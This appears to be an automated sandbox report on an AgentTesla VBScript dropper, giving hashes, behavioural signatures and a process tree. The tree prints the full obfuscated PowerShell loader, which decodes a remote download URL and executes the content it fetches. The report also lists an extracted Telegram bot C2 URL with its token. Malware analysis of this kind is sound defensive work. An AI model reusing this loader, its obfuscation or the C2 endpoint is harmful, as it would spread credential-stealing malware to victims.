Analysis
-
max time kernel
142s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
-
submitted
21-11-2023 02:00
General
-
Target
2.vbs
-
Size
63KB
-
MD5
d7f4238ff5acac175beb585a26c9cef2
-
SHA1
d451e565ec848d6fb1e5562c2a50ab4fb06d6a4f
-
SHA256
816a6f59d836acb9545db79aa246be0be62f43e330c5c93796b1fe2455eab504
-
SHA512
57bc54e5f52d6d7e780930ba82f5b0f8d72a6cd8ea580430dea73ffe37dec93f1a9ccec70f01d4ced88bc2dac4fcf6e9d920d47708a098f78b119b2eb79c4628
-
SSDEEP
768:efTBMY0EFQXNaY7jwox9F40IZZKlWD7v/IJRxQzPho+Qz0eNgzTMTH6cmJ:e24Yf/xn40IZZGWDsxKPgzuTMecmJ
Score
10/10
Malware Config
Extracted
Family
agenttesla
C2
https://api.telegram.org/bot6492548685:AAFSsnUD0WBiVAaUi2pEpecDU82loa1C6EU/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe"C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" "Function Kokain ([String]$Snyltet){For ($Erhvervsbetonede=7; $Erhvervsbetonede -lt $Snyltet.Length-1){$Tilsnits+=$Snyltet.Substring($Erhvervsbetonede, 1);$Erhvervsbetonede=$Erhvervsbetonede+8;}$Tilsnits;}$Aarvaagenhed=Kokain 'AssociahForsvintcausaestHymnaripQuinism:Splashi/Dobrasf/Semipar1hamburg0Teknolo3derheni. Bolsma1 Bulens7Klukkes6Timorou.Indblst1 Overto1Algebra1Aksiome. Sammen1 Callig6Kommuna3Voteenl/FlotatiKHittendrAbefestocoriacekSonanceu Tylerisanchovye UvurdenTegnflgsSavatio.UndelibfNielavalSportsha Selius ';$Tilsnits01=Kokain 'GaddiudiStrengpeRefreshxBetelso ';$Intercommunal= $Tilsnits01;$Tilsnits00=Kokain 'Ciruela$RapportEekvipernSnowshoc ToothpeMoorcocp MezquihSakralraLsesummlCurricuoHicksitmFurrilye ForkldtSuzyswarfenchoniProtraccDozerfr Klitori=Barless Meterma(MischarNballgoweBrockiswsyntagm-IaniminOSlukninbRabuloujPaasmrie HvastkcSlutdattBrioche LoachaNOmbygniePaprikst Eksplo.ElatrenWGrindaleTongaskbuddanneCBawdstrlKrigsreiTrachileChauvinnKatalogt Ltning)Rokketn. DunsteDderideroFaldnedw SprkkenChokolalUdeslato Femdaga agended hydrioSRomertat DecrysrInthraliFluozirnKabeltog indlan( Blsebl$ImbricaABlinketa ArterirAnsaenovPeamoutaAckgodhaKongepig EndysieRaastofnUnexchahJuleaftePhosphodFiksati)barslej ';.($Tilsnits01) (Kokain 'Hedvinp$alberikc DemaskohjecykenKoordindParatube Sixtypm EmancinOrsellieKreppetd Feezed2Egranul=Begroan$FrkhedeeCatlapanTetgloovHierofa:RaphidiaSnkningpbovestrpRetestid NasophaRidderstWestlanaUnsmili ') ;$condemned2=$condemned2+'\tilkomsten.Fje';. ($Tilsnits01) (Kokain 'Valishi$VidenskTmelodraeLgnsuppkRuttetsn recompiOuttrotkRelakseeVerdensrKreditonpartipoeCircinasBritain= Stanno-GelosinnKasauneoFredsdutSvkkels(SeddelmTSplejsneSnagglesSmaapentStarkye- ObsecrP Rdselsa StimultInertiahMedleve Tillrte$SnderkncGangliioMtaalignnoncorpdMaskinfeDefinitmAutorssnBeadroleSaturdadprecong2Selvris)triarea ') ;if ($Teknikernes) {while ($Encephalometric -eq $Tilsnits3) {& ($Tilsnits01) $Tilsnits00;.($Tilsnits01) (Kokain 'KogerauSTuaregitostraciaPalletsr SpattetRepeals- RoundsSCommunilNedsteme AntiseeBarrerapSandbls Civils5 Revuls ');}& ($Tilsnits01) (Kokain 'SkildriSPhysioge ScotoptUncreos-VelometC WhittaoSanctitnBrachestValbyspePejsestnRibosestabsolve Tilran$GttelegcOmdrejnoHjrejusn Sljfefdapologie horsiemPindensnTykkerte produkdEpiscop2 maksim boserup$ UdelikE UmennenradiotecClockcaeOctoniop BondwohCalimana JundielBerelseoDonisafmTilbydeeQuartertConditirRakkeriiPeriodic Invita ');}& ($Tilsnits01) (Kokain 'Frifind$ SandafEHuldratnConcealcFriholdeReoilsppWhitoveh PraeseaHarmedpl ombresoOverloam rowenaeVipstjrtPhosphorSatineci AtriumcOverens Beundri= Magnet ExplantGGudfrygeGrossettPlenism-SydvestCcolourcoAptenodnHysteretBeholdneKombinenOvogenotTampone Hjemsen$MarcotucDrikoffo RenskrnVelklaedsusannae DagsommPasfotonlevebrdeVideobadCopalif2gennemt ');& ($Tilsnits01) (Kokain 'Apparen$OrdholdVWoyawayiBesideloDeklinelSupervioMalkematDisjointLandhusaErhverv Uddelig=Hachisp Audiome[ VagtseSMagtstiytranspls ammunitGeneraleSkrppenmbedinvo.BrugeruCskriveboSemigirn udtrykvSexisteeForlstervinklertBogsuna]Helbehd:Lucenti:BrevstaFChoisyarsammensoKrestermSulfaquB EksperaCrosiersFremproeFlydhol6 Puerto4LeucocyS Pantnit FestonrRekordtiTallerknsammenrgFiskeek(Eleemos$ ScorpiE Hypoisn UlniercOpstsigeSkatosipVengeunhPhallita retrollSpongoboStopligmhusmndse ArbejdtFonologrImmatchi Passiacflashli)Synthet ');. ($Tilsnits01) (Kokain ' Bravur$JasiesdTEliansviVadefuglAdkomsts NonrevnSkattekienergist Skaanes silvic2Kvikkei Sejremo=Phospha jalousi[SuperfiSBuffoopyKonkavssTofagsvtRattaileJelaagbmAlmoder.OphthalTStrangueEnstemmxAarefort toaste.GrundstEIntercunGotadenc ChampaoAnmiensddronishiPulloven brushngStampub]Syndika: franko:StttevoAfictionSgrumphyCReferenIspaltniIPrincip.FllesanGSiameseeTndstiktBlokfriSKlarhovtCounterrSportziireklamenTrimarggCaturba(Coelast$igjenneVQeethiciUncribboArometel Bortvio CentritDispositExpatiaaChristi)Telefon ');. ($Tilsnits01) (Kokain 'Vimfuln$ HyperaiCurvatinPolystosTyfoideeSifonerkClipsomtPatricigPortrtticompetifTroppentboordly=Unevoka$PakkeliT AngrebiDiscabil ClaesfsParadisnTredjegi Snowbit AndelssMaillec2Minifie.Ledespos SkimmiuTrigonobSubtraksAtavicotNondepar Ridgiei AarbgenAcheatdg Gallsi(Diskuss2Doktrin7 Mellem9metalli6Ingenuo8Maclibl9Vellama,Medbygg9Bstrups0Belbsgr2 Angiot2 fundet)Ferment ');. ($Tilsnits01) $insektgift;"2⤵
- Blocklisted process makes network request
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo 16"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 18164⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3272 -ip 32721⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.6MB
-
Filesize
6.5MB
-
Filesize
6.2MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
104KB
-
Filesize
600KB
-
Filesize
136KB
-
Filesize
216KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
75.3MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
1.1MB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
18.3MB
-
Filesize
75.3MB
-
Filesize
7.7MB
-
Filesize
1.1MB
-
Filesize
256KB
-
Filesize
4KB
-
Filesize
75.3MB
-
Filesize
7.7MB